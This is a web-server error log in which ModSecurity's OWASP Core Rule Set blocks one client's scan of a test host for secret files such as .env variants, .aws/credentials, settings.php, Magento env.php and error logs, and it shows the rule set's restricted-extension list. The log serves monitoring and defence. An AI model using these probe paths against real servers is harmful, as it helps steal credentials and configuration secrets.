[Mon Jan 12 15:43:51.366565 2026] [:error] [pid 1362231] [client 18.183.223.70:50320] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWUIp8uCkgRo958sQERiSgAAAAc"]
[Mon Jan 12 15:43:51.366784 2026] [:error] [pid 1362231] [client 18.183.223.70:50320] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWUIp8uCkgRo958sQERiSgAAAAc"]
[Mon Jan 12 15:43:51.366944 2026] [:error] [pid 1362231] [client 18.183.223.70:50320] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWUIp8uCkgRo958sQERiSgAAAAc"]
[Mon Jan 12 15:43:52.084627 2026] [:error] [pid 1355923] [client 18.183.223.70:50508] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWUIqCE1xEBhFyXickXrtwAAAAA"]
[Mon Jan 12 15:43:52.084849 2026] [:error] [pid 1355923] [client 18.183.223.70:50508] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWUIqCE1xEBhFyXickXrtwAAAAA"]
[Mon Jan 12 15:43:52.085022 2026] [:error] [pid 1355923] [client 18.183.223.70:50508] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWUIqCE1xEBhFyXickXrtwAAAAA"]
[Mon Jan 12 15:43:52.816245 2026] [:error] [pid 1362233] [client 18.183.223.70:50654] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWUIqH2DuVtAKraH1YOOCwAAAAk"]
[Mon Jan 12 15:43:52.816452 2026] [:error] [pid 1362233] [client 18.183.223.70:50654] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWUIqH2DuVtAKraH1YOOCwAAAAk"]
[Mon Jan 12 15:43:52.816620 2026] [:error] [pid 1362233] [client 18.183.223.70:50654] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWUIqH2DuVtAKraH1YOOCwAAAAk"]
[Mon Jan 12 15:43:54.274031 2026] [:error] [pid 1355925] [client 18.183.223.70:50974] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWUIqk7thAymmecRvtl01AAAAAI"]
[Mon Jan 12 15:43:54.274185 2026] [:error] [pid 1355925] [client 18.183.223.70:50974] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWUIqk7thAymmecRvtl01AAAAAI"]
[Mon Jan 12 15:43:54.274399 2026] [:error] [pid 1355925] [client 18.183.223.70:50974] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWUIqk7thAymmecRvtl01AAAAAI"]
[Mon Jan 12 15:43:54.274563 2026] [:error] [pid 1355925] [client 18.183.223.70:50974] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWUIqk7thAymmecRvtl01AAAAAI"]
[Mon Jan 12 15:43:55.006326 2026] [:error] [pid 1355924] [client 18.183.223.70:51118] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWUIq9IpinFXoPzDav5wlwAAAAE"]
[Mon Jan 12 15:43:55.006556 2026] [:error] [pid 1355924] [client 18.183.223.70:51118] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWUIq9IpinFXoPzDav5wlwAAAAE"]
[Mon Jan 12 15:43:55.006708 2026] [:error] [pid 1355924] [client 18.183.223.70:51118] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWUIq9IpinFXoPzDav5wlwAAAAE"]
[Mon Jan 12 15:43:55.741539 2026] [:error] [pid 1355926] [client 18.183.223.70:51264] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWUIq8C2y5bYy1r2HoPzfgAAAAM"]
[Mon Jan 12 15:43:55.741743 2026] [:error] [pid 1355926] [client 18.183.223.70:51264] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWUIq8C2y5bYy1r2HoPzfgAAAAM"]
[Mon Jan 12 15:43:55.741918 2026] [:error] [pid 1355926] [client 18.183.223.70:51264] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWUIq8C2y5bYy1r2HoPzfgAAAAM"]
[Mon Jan 12 15:43:57.199426 2026] [:error] [pid 1365300] [client 18.183.223.70:51582] [client 18.183.223.70] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWUIrdlKlmIJBGbQbR78igAAAAs"]
[Mon Jan 12 15:43:57.199731 2026] [:error] [pid 1365300] [client 18.183.223.70:51582] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWUIrdlKlmIJBGbQbR78igAAAAs"]
[Mon Jan 12 15:43:57.199942 2026] [:error] [pid 1365300] [client 18.183.223.70:51582] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWUIrdlKlmIJBGbQbR78igAAAAs"]
[Mon Jan 12 15:43:57.917211 2026] [authz_core:error] [pid 1362231] [client 18.183.223.70:51756] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml
[Mon Jan 12 15:43:59.371640 2026] [:error] [pid 1362233] [client 18.183.223.70:52044] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWUIr32DuVtAKraH1YOODAAAAAk"]
[Mon Jan 12 15:43:59.371857 2026] [:error] [pid 1362233] [client 18.183.223.70:52044] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWUIr32DuVtAKraH1YOODAAAAAk"]
[Mon Jan 12 15:43:59.372019 2026] [:error] [pid 1362233] [client 18.183.223.70:52044] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWUIr32DuVtAKraH1YOODAAAAAk"]
[Mon Jan 12 15:44:00.100740 2026] [:error] [pid 1356126] [client 18.183.223.70:52200] [client 18.183.223.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWUIsDv8xyMiuvwfNnlkBgAAAAU"]
[Mon Jan 12 15:44:00.100990 2026] [:error] [pid 1356126] [client 18.183.223.70:52200] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWUIsDv8xyMiuvwfNnlkBgAAAAU"]
[Mon Jan 12 15:44:00.101155 2026] [:error] [pid 1356126] [client 18.183.223.70:52200] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWUIsDv8xyMiuvwfNnlkBgAAAAU"]
[Mon Jan 12 15:44:00.819070 2026] [:error] [pid 1358564] [client 18.183.223.70:52362] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWUIsB_UgGRJ4jDk47tQngAAAAY"]
[Mon Jan 12 15:44:00.819405 2026] [:error] [pid 1358564] [client 18.183.223.70:52362] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWUIsB_UgGRJ4jDk47tQngAAAAY"]
[Mon Jan 12 15:44:00.819559 2026] [:error] [pid 1358564] [client 18.183.223.70:52362] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWUIsB_UgGRJ4jDk47tQngAAAAY"]
[Mon Jan 12 15:44:01.542893 2026] [:error] [pid 1355925] [client 18.183.223.70:52498] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWUIsU7thAymmecRvtl01QAAAAI"]
[Mon Jan 12 15:44:01.543229 2026] [:error] [pid 1355925] [client 18.183.223.70:52498] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWUIsU7thAymmecRvtl01QAAAAI"]
[Mon Jan 12 15:44:01.543395 2026] [:error] [pid 1355925] [client 18.183.223.70:52498] [client 18.183.223.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aWUIsU7thAymmecRvtl01QAAAAI"]
[Mon Jan 12 15:44:05.912092 2026] [authz_core:error] [pid 1355923] [client 18.183.223.70:53426] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/nginx
[Mon Jan 12 15:44:06.643676 2026] [authz_core:error] [pid 1362233] [client 18.183.223.70:53578] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/log/apache2
[Mon Jan 12 15:44:07.374538 2026] [authz_core:error] [pid 1356126] [client 18.183.223.70:53716] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php
[Mon Jan 12 15:44:08.104532 2026] [:error] [pid 1358564] [client 18.183.223.70:53882] [client 18.183.223.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWUIuB_UgGRJ4jDk47tQnwAAAAY"]
[Mon Jan 12 15:44:08.104846 2026] [:error] [pid 1358564] [client 18.183.223.70:53882] [client 18.183.223.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/application.log"] [unique_id "aWUIuB_UgGRJ4jDk47tQnwAAAAY"]
